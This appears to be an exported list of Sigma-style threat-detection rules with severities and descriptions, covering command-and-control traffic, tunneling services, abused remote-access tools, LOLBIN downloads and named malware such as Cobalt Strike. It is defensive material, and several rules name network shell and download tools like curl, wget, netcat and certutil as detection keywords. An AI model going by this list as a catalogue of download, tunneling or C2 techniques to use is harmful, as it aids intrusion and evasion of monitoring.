Antivirus Exploitation Framework Detection | critical | Detects a highly relevant antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
Malicious IP Address Sign-In Failure Rate | high | Indicates sign-in from a malicious IP address based on high failure rates.
Malicious IP Address Sign-In Suspicious | high | Indicates sign-in from an IP address known to be malicious at the time of sign-in.
Sign-In From Malware Infected IP | high | Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.
Activity from Suspicious IP Addresses | medium | Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate a compromised account.
Activity from Anonymous IP Addresses | medium | Detects when Microsoft Cloud App Security reports that users were active from an IP address that has been identified as an anonymous proxy IP address.
Activity from Infrequent Country | medium | Detects when Microsoft Cloud App Security reports that an activity occurred from a location that was not recently or never visited by any user in the organization.
Okta Security Threat Detected | medium | Detects when a security threat is detected in Okta.
Suspicious C2 Activities | medium | Detects suspicious activities as declared by Florian Roth in his 'Best Practice Auditd Configuration'. This includes the detection of the following commands: wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the "Command and Control" tactic, including, not exhaustively, the following: Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
Remote File Copy | low | Detects the use of tools that copy files from or to remote systems
Wget Creating Files in Tmp Directory | medium | Detects the use of wget to download content to a temporary directory such as "/tmp" or "/var/tmp"
Communication To Ngrok Tunneling Service - Linux | high | Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors
Communication To LocaltoNet Tunneling Service Initiated - Linux | high | Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen using this service for command-and-control activities to bypass MFA and perimeter controls.
Potentially Suspicious Malware Callback Communication - Linux | high | Detects programs that connect to known malware callback ports based on threat intelligence reports.
Curl Usage on Linux | low | Detects a curl process start on Linux, which indicates a file download from a remote location or a simple web request to a remote server
Potential Linux Amazon SSM Agent Hijacking | medium | Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Suspicious Curl Change User Agents - Linux | medium | Detects a suspicious curl process start on Linux with user agent options set
Download File To Potentially Suspicious Directory Via Wget | medium | Detects the use of wget to download content to a suspicious directory
Suspicious Installer Package Child Process | medium | Detects the execution of suspicious child processes from a macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
File Download Via Nscurl - MacOS | medium | Detects the execution of the nscurl utility in order to download files.
Potential In-Memory Download And Compile Of Payloads | medium | Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
Potential WizardUpdate Malware Infection | high | Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data, and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
Potential XCSSET Malware Infection | medium | Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
Cisco Stage Data | low | Various protocols may be used to put data on the device for exfiltration or infiltration
Cobalt Strike DNS Beaconing | critical | Detects suspicious DNS queries known from Cobalt Strike beacons
Suspicious DNS Query with B64 Encoded String | medium | Detects suspicious DNS queries using base64 encoding
Telegram Bot API Request | medium | Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
DNS TXT Answer with Possible Execution Strings | high | Detects strings used in command execution in DNS TXT Answers
Wannacry Killswitch Domain | high | Detects WannaCry killswitch domain DNS queries
Default Cobalt Strike Certificate | high | Detects the presence of the default Cobalt Strike certificate in HTTPS traffic
New Kind of Network (NKN) DetectionlowNKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>
Suspicious DNS Z Flag Bit SetmediumThe DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
Executable from WebdavmediumDetects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/
Download from Suspicious Dyndns HostsmediumDetects download of certain file types from hosts with dynamic DNS names (selected list)
Windows WebDAV User AgenthighDetects WebDav DownloadCradle
HackTool - CobaltStrike Malleable Profile Patterns - ProxyhighDetects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).
HackTool - BabyShark Agent Default URL PatterncriticalDetects Baby Shark C2 Framework default communication patterns
HackTool - Empire UserAgent URI CombohighDetects user agent and URI paths used by empire agents
PwnDrp AccesscriticalDetects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
Raw Paste Service AccesshighDetects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Telegram API AccessmediumDetects suspicious requests to Telegram API without the usual Telegram User-Agent
APT User AgenthighDetects suspicious user agent strings used in APT malware in proxy logs
Suspicious Base64 Encoded User-AgentmediumDetects suspicious encoded User-Agent strings, as seen used by some malware.
Bitsadmin to Uncommon IP Server AddresshighDetects Bitsadmin connections to IP addresses instead of FQDN names
Bitsadmin to Uncommon TLDhighDetects Bitsadmin connections to domains with uncommon TLDs
Crypto Miner User AgenthighDetects suspicious user agent strings used by crypto miners in proxy logs
HTTP Request With Empty User AgentmediumDetects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
Exploit Framework User AgenthighDetects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
Malware User AgenthighDetects suspicious user agent strings used by malware in proxy logs
Windows PowerShell User AgentmediumDetects Windows PowerShell Web Access
Suspicious User AgenthighDetects suspicious malformed user agent strings in proxy logs
Potential Base64 Encoded User-AgentmediumDetects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
DNS Query To Put.io - DNS ClientmediumDetects DNS queries for subdomains related to "Put.io" sharing website.
Query Tor Onion Address - DNS ClienthighDetects DNS resolution of an .onion address related to Tor routing networks
Suspicious Cobalt Strike DNS Beaconing - DNS ClientcriticalDetects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Potential Remote Desktop Connection to Non-Domain HostmediumDetects logons using NTLM to hosts that are potentially not part of the domain.
RDP over Reverse SSH Tunnel WFPhighDetects svchost hosting RDP termsvcs communicating with the loopback address
Suspicious LDAP-Attributes UsedhighDetects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
Password Protected ZIP File Opened (Suspicious Filenames)highDetects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
Mesh Agent Service InstallationmediumDetects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers
TacticalRMM Service InstallationmediumDetects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.
Ngrok Usage with Remote Desktop ServicehighDetects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
AppX Package Installation Attempts Via AppInstaller.EXEmediumDetects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL
Cloudflared Tunnels Related DNS RequestsmediumDetects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
DNS Query To Devtunnels DomainmediumDetects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
DNS Query To AzureWebsites.NET By Non-Browser ProcessmediumDetects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
Suspicious Cobalt Strike DNS Beaconing - SysmoncriticalDetects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
DNS Query To Remote Access Software Domain From Non-Browser AppmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
TeamViewer Domain Query By Non-TeamViewer ApplicationmediumDetects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)
DNS Query Tor .Onion Address - SysmonhighDetects DNS queries to an ".onion" address related to Tor routing networks
DNS Query To Visual Studio Code Tunnels DomainmediumDetects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
ADSI-Cache File Creation By Uncommon ToolmediumDetects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
Suspicious Binary Writes Via AnyDeskhighDetects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
Anydesk Temporary ArtefactmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
GoToAssist Temporary Installation ArtefactmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
HackTool - Inveigh Execution ArtefactscriticalDetects the presence and execution of Inveigh via dropped artefacts
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module IndicatorshighDetects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
Installation of TeamViewer DesktopmediumTeamViewer_Desktop.exe is create during install
New Outlook Macro CreatedmediumDetects the creation of a macro file for Outlook.
Suspicious Outlook Macro CreatedhighDetects the creation of a macro file for Outlook.
ScreenConnect Temporary Installation ArtefactmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Suspicious Desktopimgdownldr Target FilehighDetects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
TeamViewer Remote SessionmediumDetects the creation of log files during a TeamViewer remote session
Hijack Legit RDP Session to Move LaterallyhighDetects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
Visual Studio Code Tunnel Remote File CreationmediumDetects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
Renamed VsCode Code Tunnel Execution - File IndicatorhighDetects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
HackTool - SILENTTRINITY Stager DLL LoadhighDetects SILENTTRINITY stager dll loading activity
Uncommon Network Connection Initiated By Certutil.EXEhighDetects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
Network Connection Initiated To AzureWebsites.NET By Non-Browser ProcessmediumDetects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
Network Connection Initiated To Cloudflared Tunnels DomainsmediumDetects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
New Connection Initiated To Potential Dead Drop Resolver DomainhighDetects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
Suspicious Dropbox API UsagehighDetects an executable that isn't dropbox but communicates with the Dropbox API
Suspicious Non-Browser Network Communication With Google APImediumDetects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
Communication To LocaltoNet Tunneling Service InitiatedhighDetects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
Communication To Ngrok Tunneling Service InitiatedhighDetects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
Potentially Suspicious Network Connection To Notion APIlowDetects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
Network Communication Initiated To Portmap.IO DomainmediumDetects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Suspicious Non-Browser Network Communication With Telegram APImediumDetects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
Network Connection Initiated By IMEWDBLD.EXEhighDetects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
Network Connection Initiated Via Notepad.EXEhighDetects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
Office Application Initiated Network Connection Over Uncommon PortsmediumDetects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
RDP Over Reverse SSH TunnelhighDetects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
RDP to HTTP or HTTPS Target PortshighDetects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Remote Access Tool - AnyDesk Incoming ConnectionmediumDetects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon LocationhighDetects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
Potentially Suspicious Malware Callback CommunicationhighDetects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious FolderhighDetects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
Communication To Uncommon Destination PortsmediumDetects programs that connect to uncommon destination ports
Outbound Network Connection To Public IP Via WinlogonmediumDetects a "winlogon.exe" process that initiate network communications with public IP addresses
Suspicious Wordpad Outbound ConnectionsmediumDetects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.
Outbound Network Connection Initiated By Script InterpreterhighDetects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
Local Network Connection Initiated By Script InterpretermediumDetects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
Netcat The Powershell VersionmediumAdversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
Silence.EDA DetectioncriticalDetects Silence EmpireDNSAgent as described in the Group-IP report
Potential COM Objects Download Cradles Usage - PS ScriptmediumDetects usage of COM objects that can be abused to download files in PowerShell by CLSID
Suspicious FromBase64String Usage On Gzip Archive - Ps ScriptmediumDetects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
Change User Agents with WebRequestmediumAdversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Suspicious TCP Tunnel Via PowerShell ScriptmediumDetects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity
Suspicious SSL ConnectionlowAdversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
Testing Usage of Uncommonly Used PortmediumAdversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.
Browser Execution In Headless ModemediumDetects execution of Chromium based browser in headless mode
File Download with Headless BrowserhighDetects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
File Download From Browser Process Via Inline URLmediumDetects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
Tor Client/Browser ExecutionhighDetects the use of Tor or Tor-Browser to connect to onion routing networks
File Download via CertOC.EXEmediumDetects when a user downloads a file by using CertOC.exe
File Download From IP Based URL Via CertOC.EXEhighDetects when a user downloads a file from an IP based URL using CertOC.exe
Cloudflared Portable ExecutionmediumDetects the execution of the "cloudflared" binary from a non standard location.
Cloudflared Quick Tunnel ExecutionmediumDetects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.
Cloudflared Tunnel Connections CleanupmediumDetects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
Cloudflared Tunnel ExecutionmediumDetects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
Curl Download And Execute CombinationhighAdversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Command Line Execution with Suspicious URL and AppData StringsmediumDetects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Potential Download/Upload Activity Using Type CommandmediumDetects usage of the "type" command to download/upload data from WebDAV server
Suspicious Curl.EXE DownloadhighDetects a suspicious curl process start on Windows and outputs the requested document to a local file
Remote File Download Via Desktopimgdownldr UtilitymediumDetects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
Suspicious Desktopimgdownldr CommandhighDetects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
DNS Exfiltration and Tunneling Tools ExecutionhighWell-known DNS Exfiltration tools execution
Finger.EXE ExecutionhighDetects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
Arbitrary File Download Via GfxDownloadWrapper.EXEmediumDetects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
File Download Using Notepad++ GUP UtilityhighDetects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
HackTool - Htran/NATBypass ExecutionhighDetects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
HackTool - SharpChisel ExecutionhighDetects usage of the Sharp Chisel via the commandline arguments
HackTool - SILENTTRINITY Stager ExecutionhighDetects SILENTTRINITY stager use via PE metadata
File Download And Execution Via IEExec.EXEhighDetects execution of the IEExec utility to download and execute files
Suspicious Child Process Of Manage Engine ServiceDeskhighDetects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
Import LDAP Data Interchange Format File Via Ldifde.EXEmediumDetects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
Suspicious Diantz Download and Compress Into a CAB FilemediumDownload and compress a remote file and store it in a cab file on local machine.
Suspicious Extrac32 ExecutionmediumDownload or Copy file with Extrac32
PrintBrm ZIP Creation of ExtractionhighDetects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Replace.exe UsagemediumDetects the use of Replace.exe which can be used to replace file with another file
Suspicious Certreq Command to DownloadhighDetects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files
File Download Via Windows Defender MpCmpRun.EXEhighDetects the use of Windows Defender MpCmdRun.EXE to download files
MsiExec Web InstallmediumDetects suspicious msiexec process starts with web addresses as parameter
Mstsc.EXE Execution With Local RDP FilelowDetects potential RDP connection via Mstsc using a local ".rdp" file
Suspicious Mstsc.EXE Execution With Local RDP FilehighDetects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
New Port Forwarding Rule Added Via Netsh.EXEmediumDetects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
RDP Port Forwarding Rule Added Via Netsh.EXEhighDetects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
Suspicious Plink Port ForwardinghighDetects suspicious Plink tunnel port forwarding to a local port
Potential RDP Tunneling Via PlinkhighExecution of plink to perform data exfiltration and tunneling
Gzip Archive Decode Via PowerShellmediumDetects attempts of decoding encoded Gzip archives via PowerShell.
Potential COM Objects Download Cradles Usage - Process CreationmediumDetects usage of COM objects that can be abused to download files in PowerShell by CLSID
PowerShell Web DownloadmediumDetects suspicious ways to download files or content using PowerShell
Potential DLL File Download Via PowerShell Invoke-WebRequestmediumDetects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
Suspicious FromBase64String Usage On Gzip Archive - Process CreationmediumDetects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
Suspicious Invoke-WebRequest Execution With DirectIPmediumDetects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
Suspicious Invoke-WebRequest ExecutionhighDetects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
PowerShell DownloadFilehighDetects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
PUA - 3Proxy ExecutionhighDetects the use of 3proxy, a tiny free proxy server
PUA - Chisel Tunneling Tool ExecutionhighDetects usage of the Chisel tunneling tool via the commandline arguments
PUA - Fast Reverse Proxy (FRP) ExecutionhighDetects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
PUA- IOX Tunneling Tool ExecutionhighDetects the use of IOX - a tool for port forwarding and intranet proxy purposes
PUA - Netcat Suspicious ExecutionhighDetects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
PUA - Ngrok ExecutionhighDetects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
PUA - Nimgrab ExecutionhighDetects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
PUA - NPS Tunneling Tool ExecutionhighDetects the use of NPS, a port forwarding and intranet penetration proxy server
Potentially Suspicious Usage Of QemumediumDetects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
QuickAssist ExecutionlowDetects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
Remote Access Tool - AnyDesk ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - AnyDesk Piped Password Via CLImediumDetects piping the password to an anydesk instance via CMD and the '--set-password' flag.
Remote Access Tool - AnyDesk Silent InstallationhighDetects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
Remote Access Tool - Anydesk Execution From Suspicious Folder | high | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - MeshAgent Command Execution via MeshCentral | medium | Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
Remote Access Tool - NetSupport Execution | medium | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - GoToAssist Execution | medium | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - LogMeIn Execution | medium | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - ScreenConnect Execution | medium | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution | medium | Detects potentially suspicious child processes launched via the ScreenConnect client service.
Remote Access Tool - Simple Help Execution | medium | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - UltraViewer Execution | medium | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Renamed Cloudflared.EXE Execution | high | Detects the execution of a renamed "cloudflared" binary.
Renamed Remote Utilities RAT (RURAT) Execution | medium | Detects execution of renamed Remote Utilities (RURAT) via the Product PE header field.
Port Forwarding Activity Via SSH.EXE | medium | Detects port forwarding activity via SSH.exe.
Potential RDP Tunneling Via SSH | high | Execution of ssh.exe to perform data exfiltration and tunneling through RDP.
Potential Amazon SSM Agent Hijacking | medium | Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Suspicious Download from Office Domain | high | Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents.
Suspicious TSCON Start as SYSTEM | high | Detects a tscon.exe start as LOCAL SYSTEM.
Use of UltraVNC Remote Access Software | medium | An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.
Visual Studio Code Tunnel Execution | medium | Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel.
Visual Studio Code Tunnel Shell Execution | medium | Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
Renamed Visual Studio Code Tunnel Execution | high | Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel.
Visual Studio Code Tunnel Service Installation | medium | Detects the installation of VsCode tunnel (code-tunnel) as a service.
Pandemic Registry Key | critical | Detects Pandemic Windows Implant.
New PortProxy Registry Entry Added | medium | Detects the modification of the PortProxy registry key which is used for port forwarding.
Lolbas OneDriveStandaloneUpdater.exe Proxy Download | high | Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting | high | Detects the modification of the Outlook setting "LoadMacroProviderOnBoot" which, if enabled, allows the automatic loading of any configured VBA project/module.
Outlook Macro Execution Without Warning Setting Enabled | high | Detects the modification of the Outlook security setting to allow unprompted execution of macros.
Equation Group C2 Communication | high | Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools.
OilRig APT Activity | critical | Detects OilRig activity as reported by Nyotron in their March 2018 report.
OilRig APT Registry Persistence | critical | Detects OilRig registry persistence as reported by Nyotron in their March 2018 report.
OilRig APT Schedule Task Persistence - Security | critical | Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report.
OilRig APT Schedule Task Persistence - System | critical | Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report.
